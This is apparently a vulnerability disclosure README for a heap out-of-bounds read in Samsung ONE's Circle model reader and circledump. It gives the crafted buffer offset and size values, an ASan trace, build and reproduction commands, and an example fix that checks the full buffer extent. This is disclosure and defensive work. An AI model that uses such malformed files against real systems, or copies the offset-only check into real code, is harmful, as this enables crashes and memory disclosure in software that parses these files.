# Circle External Buffer Offset/Size OOB Read PoC

This repository contains a minimal Circle model file that demonstrates an out-of-bounds read in Samsung ONE's Circle inspection path.

## Summary

Samsung ONE's `mio_circle::Reader::buffer_info()` handles Circle external buffers by checking only the starting `offset` with `std::vector::at()`, then returning the attacker-controlled `size` to callers. A Circle file can set an external buffer to start at the final byte of the file and advertise a much larger size. `circledump` then reads past the end of the file buffer while dumping that buffer.

## Artifact

- PoC model: `poc/external_offset_oob.circle`
- SHA256: `20962ae3e01d2489f1ba6766f4d804414e5e5cb490589a23aa986f97abe0abd5`
- File size: 232 bytes
- External buffer values: `offset=231`, `size=4096`

## Evidence

The captured ASan trace is in `poc/asan-circledump-direct.stderr.txt`. Relevant top of stack:

```text
ERROR: AddressSanitizer: heap-buffer-overflow
READ of size 1
circledump::dump_buffer(...) Dump.cpp:48
circledump::dump_model(...) Dump.cpp:404
operator<<(...) Dump.cpp:479
circledump_direct_driver.cpp:41
0 bytes after 232-byte region
```

## Reproduction Outline

Use Samsung ONE current source and FlatBuffers 23.5.26.
Build `flatc`/`libflatbuffers`, regenerate the Circle schema header, then compile the direct `circledump` core driver with ASan:

```bash
cmake -S /tmp/flatbuffers-23.5.26 -B /tmp/flatbuffers-23.5.26-build \
  -G Ninja -DFLATBUFFERS_BUILD_TESTS=OFF -DFLATBUFFERS_INSTALL=OFF -DCMAKE_BUILD_TYPE=Release
cmake --build /tmp/flatbuffers-23.5.26-build --target flatc flatbuffers -j2
# Assumed: the Circle schema header regenerated with flatc is placed under /tmp/circle-include-current.
clang++ -std=c++17 -O1 -g -fsanitize=address,undefined -fno-omit-frame-pointer \
  -I/tmp/flatbuffers-23.5.26/include \
  -I/tmp/circle-include-current \
  -I/path/to/ONE/compiler/mio-circle/include \
  -I/path/to/ONE/compiler/circledump/include \
  -I/path/to/ONE/compiler/circledump/src \
  poc/circledump_direct_driver.cpp \
  /path/to/ONE/compiler/circledump/src/Dump.cpp \
  /path/to/ONE/compiler/circledump/src/MetadataPrinter.cpp \
  /path/to/ONE/compiler/circledump/src/OpPrinter.cpp \
  /path/to/ONE/compiler/mio-circle/src/Reader.cpp \
  /path/to/ONE/compiler/mio-circle/src/Helper.cpp \
  /tmp/flatbuffers-23.5.26-build/libflatbuffers.a \
  -o /tmp/circledump_direct_driver_current
ASAN_OPTIONS=abort_on_error=0:symbolize=1 \
  /tmp/circledump_direct_driver_current poc/external_offset_oob.circle
```

Full local notes are in `TECHNICAL_NOTES.md`.
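The full-extent check that the Summary describes as missing, as an added example that is not mio_circle's code: `BufferView`, `checked_buffer_info`, `dump_checked` and the 232-byte constructed model are hypothetical stand-ins for the reader, the dumper and the PoC file. It goes slightly beyond the PoC's values by also rejecting offset/size pairs whose sum would wrap around.

```cpp
#include <cstddef>
#include <cstdint>
#include <cstdio>
#include <vector>

// Hypothetical stand-in for a validated buffer lookup (not mio_circle's code);
// data == nullptr means the external buffer was rejected instead of returned.
struct BufferView { const uint8_t *data; size_t size; };

// The range check the summary says is missing: all of [offset, offset + size)
// must lie inside the file. Uses subtraction so offset + size cannot wrap.
bool external_buffer_in_bounds(size_t file_size, uint64_t offset, uint64_t size)
{
  if (offset > file_size)
    return false;                    // start already past the end of the file
  return size <= file_size - offset; // offset + size <= file_size, overflow-safe
}

// Validated lookup: checks the full extent before handing `size` to callers,
// unlike an offset-only at() check that lets a huge size through.
BufferView checked_buffer_info(const std::vector<uint8_t> &model, uint64_t offset, uint64_t size)
{
  if (!external_buffer_in_bounds(model.size(), offset, size))
    return BufferView{nullptr, 0};
  return BufferView{model.data() + offset, static_cast<size_t>(size)};
}

// Dumper built on the validated lookup: returns the sum of the bytes it read
// (every byte of the constructed model is 0x01, so this equals the byte count),
// or -1 when the buffer was rejected.
long dump_checked(const std::vector<uint8_t> &model, uint64_t offset, uint64_t size)
{
  BufferView view = checked_buffer_info(model, offset, size);
  if (view.data == nullptr)
    return -1;
  long sum = 0;
  for (size_t i = 0; i < view.size; ++i)
    sum += view.data[i];
  return sum;
}

// Constructed 232-byte stand-in with the PoC file's dimensions; not the real model bytes.
std::vector<uint8_t> constructed_model() { return std::vector<uint8_t>(232, 0x01); }

int main()
{
  std::vector<uint8_t> model = constructed_model();
  std::printf("offset=231 size=4096 -> %ld\n", dump_checked(model, 231, 4096)); // -1
  std::printf("offset=231 size=1    -> %ld\n", dump_checked(model, 231, 1));    // 1
}
```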